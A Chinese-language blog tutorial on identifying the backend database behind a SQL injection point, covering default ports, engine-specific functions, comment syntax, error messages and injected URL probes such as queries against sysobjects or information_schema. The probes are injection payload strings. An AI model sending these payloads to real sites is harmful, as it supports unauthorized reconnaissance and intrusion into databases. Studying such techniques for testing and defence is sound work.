SQL注入之判断数据库

0|1前端与数据库类型

asp:sql server,Access
.net :sql server
php:PostgreSQL,Mysql
java:Oracle,Mysql
这个有助于缩小我们的判断范围。

0|1根据端口判断

 

我们可以扫描其对应的端口来做判断:

Oracle

port:端口号,默认是1521

SQL Server

port:端口号,默认是1433

ms SQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。

MySQL

port:端口号,默认3306

Access

Access数据库属于文件型数据库 所以不需要端口号

0|1数据库特有的函数

len和length

在mssql和mysql以及db2内,返回长度值是调用len()函数;在oracle和INFORMIX则是通过length()来返回长度值。

当你使用and len('a')=1的时候,返回正常页面时,可以推断当前的数据库类型可能是mssql,或mysql,或是db2。反之则可能会是oracle和informix。

@@version和version()

在mysql内,可以用@@version或是version()来返回当前的版本信息。但无法判断是mysql还是mssql时,可以用version()函数来构造判断。version()>1 返回与@@version>1 相同页面时,则可能是mysql。如果出现提示version()错误时,则可能是mssql。

substring和substr

在mssql中可以调用substring。oracle则只可调用substr
总结一下:

sql server: @@pack_received @@rowcount mysql:connection_id() last_insert_id() row_count() orcale:bitand(1,1) postgresql: select extract(dow from now())

0|1对于字符串处理方式

sql server :id=1 and 'a'+'b'='ab' --

mssql:id=1 and 'a'+'b'='ab'

mysql:id=1 and 'a'+'b'='ab' , 'ab'=concat('a','b')

oracle:id=1 and 'a'+'b'='a'||'b' ,'ab'=concat('a','b')

postgresql :id=1 and 'a'+'b'='a'||'b' ,'ab'=concat('a','b')

0|1特殊符号,注释的判断

 

“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:

“--”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:

“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。

在注入点后加(必须为注入点);--(一个分号,两个横线),例如:http://xxxx/article/as.asp?id=1;--。如果返回正常的话,说明数据库是MSSQL。在MSSQL数据库中;和--都是存在的,;用来分离两个语句,而--就是注释符,它后面语句都不执行。如果返回错误,基本可以肯定是ACCESS数据库了。

总结一下:

1,“null”和“%00”是Access支持的注释。 2,“#”是MySQL中的注释符,返回错误说明该注入点可能不是MySQL,另外也支持’-- ',和/* */注释(注意mysql使用-- 时需要后面添加空格) 3,“–”和/* */是Oracle,SQL server和MSSQL支持的注释符,如果正常,说明可能就是这仨了。 4,“;”是子句查询标识符,在Oracle中不支持多行查询,返回错误,很可能是Oracle数据库。 这样一串下来,基本就知道了数据库类型了

0|1MySQL和Mssql和access数据库的判断

Access: and (select count(*) from MSysAccessObjects)>0 返回正常说明是access and exists(select count(*) from 表) SQLserver: and (select count(*) from sysobjects) >0 返回正常说明是mssql,这个表只有MSSQL数据库才有 MySQL: and length(user())>0 返回正常说明是MySQL

0|1根据其返回的错误类型

ORACLE
ORA-01756:quoted string not properly terminated
ORA-00933:SQLcommand not properly ended
MS-SQL
Msg 170,level 15, State 1,Line 1
Line 1:Incorrect syntax near ‘foo
Msg 105,level 15,state 1,Line 1
Unclose quotation mark before the character string ‘foo
MYSQL
you have an error in your SQL syntax,check the manual that corresponds to you mysql server version for the right stntax to use near ‘’foo’ at line x

0|1通过各个数据库特有的数据表来判断

1、mssql数据库

http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

2、access数据库

http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)>0 and 1=1

3、mysql数据库(mysql版本在5.0以上)

http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

4、oracle数据库

http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值